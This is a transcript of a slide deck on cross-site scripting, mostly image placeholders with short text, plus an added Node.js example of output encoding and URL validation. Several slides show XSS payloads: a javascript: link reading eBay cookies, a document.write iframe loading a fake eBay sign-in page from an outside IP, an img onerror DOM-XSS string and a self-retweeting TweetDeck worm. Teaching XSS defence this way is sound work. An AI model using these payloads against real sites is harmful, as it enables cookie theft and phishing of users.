Cross Site Scripting Going Beyond the Alert Box
Uploaded by aaron-weaver. Category: Internet.
Transcript of Cross Site Scripting Going Beyond the Alert Box
![Page 1: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/1.jpg)
alert('xss')
![Page 2: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/2.jpg)
OWASP owasp.org
![Page 3: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/3.jpg)
![Page 4: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/4.jpg)
XSS flaws occur when an application includes user supplied data in a page sent to the browser without properly validating or escaping that content.
![Page 5: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/5.jpg)
![Page 6: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/6.jpg)
![Page 7: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/7.jpg)
Caused by an application that:
● Fails to properly validate untrusted data.
● Fails to properly encode output data.
![Page 8: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/8.jpg)
Generally an attack against an application’s users, not an application.
![Page 9: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/9.jpg)
![Page 10: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/10.jpg)
Source: http://excess-xss.com/
![Page 11: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/11.jpg)
Source: http://excess-xss.com/
![Page 12: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/12.jpg)
Source: http://excess-xss.com/
![Page 13: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/13.jpg)
Source: http://excess-xss.com/
![Page 14: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/14.jpg)
Source: http://excess-xss.com/
![Page 15: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/15.jpg)
![Page 16: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/16.jpg)
![Page 17: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/17.jpg)
![Page 18: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/18.jpg)
http://ebay.com/link/?nav=webview&url=javascript:alert(document.cookie)
Note: XSS doesn’t always need a <script> tag to execute.
![Page 19: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/19.jpg)
Bonus Points: What is missing on eBay’s cookies?
![Page 20: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/20.jpg)
![Page 21: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/21.jpg)
document.write('<iframe src="http://45.55.162.179/ebay/signin.ebay.com/ws/eBayISAPI9f90.html" width="1500" height="1000">')
![Page 23: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/23.jpg)
![Page 24: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/24.jpg)
Set to automatically retweet via the data-action="retweet" attribute, causing a chain reaction for anyone who logs into TweetDeck.
![Page 25: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/25.jpg)
![Page 26: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/26.jpg)
https://www.incapsula.com/blog/world-largest-site-xss-ddos-zombies.html
![Page 27: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/27.jpg)
![Page 28: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/28.jpg)
![Page 29: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/29.jpg)
https://xss-doc.appspot.com/demo/3#'><img src=x onerror=alert(/DOM-XSS/)>
https://www.google.com/about/appsecurity/learning/xss/
![Page 30: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/30.jpg)
![Page 31: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/31.jpg)
![Page 32: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/32.jpg)
![Page 33: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/33.jpg)
![Page 34: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/34.jpg)
![Page 35: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/35.jpg)
![Page 36: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/36.jpg)
![Page 37: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/37.jpg)
![Page 38: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/38.jpg)
![Page 39: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/39.jpg)
![Page 40: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/40.jpg)
![Page 41: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/41.jpg)
![Page 42: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/42.jpg)
![Page 43: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/43.jpg)
![Page 44: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/44.jpg)
![Page 45: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/45.jpg)
![Page 46: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/46.jpg)
http://gauntlt.org/
![Page 47: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/47.jpg)
![Page 48: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/48.jpg)
https://github.com/gauntlt
![Page 49: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/49.jpg)
![Page 50: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/50.jpg)
DevOps with Pipeline
![Page 51: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/51.jpg)
![Page 52: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/52.jpg)
![Page 53: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/53.jpg)
![Page 55: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/55.jpg)
![Page 56: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/56.jpg)
![Page 57: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/57.jpg)
![Page 58: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/58.jpg)
![Page 59: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/59.jpg)
● Ruby/ERB: <%= h foo.bar %>
● ASP.NET: Server.HtmlEncode(string)
● https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
● https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
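The deck names two defences (validate untrusted data, encode output data) and closes with the per-framework encoders above. The following is an added example, not code from the slides or from OWASP, showing both defences applied to the two payload shapes the deck demonstrates: the eBay-style `nav=webview&url=javascript:...` link and the `'><img src=x onerror=...>` DOM-XSS string. Names such as `encodeForHtml`, `safeUrl` and `renderWebviewLink` are this example's own, and the sample inputs are constructed. It runs on Node.js with no dependencies.

```javascript
// Added example (not from the slides): output encoding plus URL-scheme
// validation, applied to the payload shapes shown on the demo slides.
// Node.js >= 10, no dependencies. All sample inputs are constructed.

const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

// Output encoding for HTML body text and double-quoted attribute values.
// Every character that can open or close a tag, attribute or entity is
// replaced, so "<img src=x onerror=...>" becomes literal text, never markup.
function encodeForHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Input validation for a URL that will land in href/src. Encoding alone does
// not help here: a javascript: URL contains no characters that need escaping,
// so the scheme must be allow-listed. The WHATWG URL parser strips embedded
// tabs/newlines and lower-cases the scheme, so "JaVa\tScRiPt:" is still caught.
// Returns the normalised absolute URL, or null when rejected.
function safeUrl(untrusted) {
  let parsed;
  try {
    parsed = new URL(String(untrusted).trim());
  } catch (e) {
    return null; // relative or unparseable: reject rather than guess
  }
  if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') return null;
  return parsed.href;
}

// A hardened rendering of the "nav=webview&url=..." pattern from the eBay
// slide: the url parameter is validated, the label is output-encoded, and a
// rejected URL yields plain text with no link at all.
function renderWebviewLink(urlParam, label) {
  const href = safeUrl(urlParam);
  if (href === null) return encodeForHtml(label);
  return `<a href="${encodeForHtml(href)}">${encodeForHtml(label)}</a>`;
}

// Demo when run directly: node xss_defence.js
if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderWebviewLink('javascript:alert(document.cookie)', 'Sign in'));
  console.log(renderWebviewLink('https://www.ebay.com/', 'Sign in'));
  console.log(encodeForHtml("'><img src=x onerror=alert(/DOM-XSS/)>"));
}

if (typeof module !== 'undefined') {
  module.exports = { encodeForHtml, safeUrl, renderWebviewLink };
}
```

Two points the example is meant to make: the `javascript:` link on the eBay slide survives HTML encoding untouched, which is why a URL parameter needs scheme validation and not just an encoder; and the `document.cookie` read in that payload is exactly what the `HttpOnly` cookie attribute denies to script, so output encoding, URL validation and cookie flags are layered rather than alternative defences.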
![Page 60: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/60.jpg)
![Page 61: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/61.jpg)
![Page 62: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/62.jpg)
![Page 63: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/63.jpg)
![Page 64: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/64.jpg)
![Page 65: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/65.jpg)
![Page 66: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/66.jpg)
![Page 67: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/67.jpg)
![Page 68: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/68.jpg)
![Page 69: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/69.jpg)
![Page 70: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/70.jpg)
![Page 71: Cross Site Scripting Going Beyond the Alert Box](https://reader031.fdocuments.in/reader031/viewer/2022021922/58ed993f1a28ab100b8b4601/html5/thumbnails/71.jpg)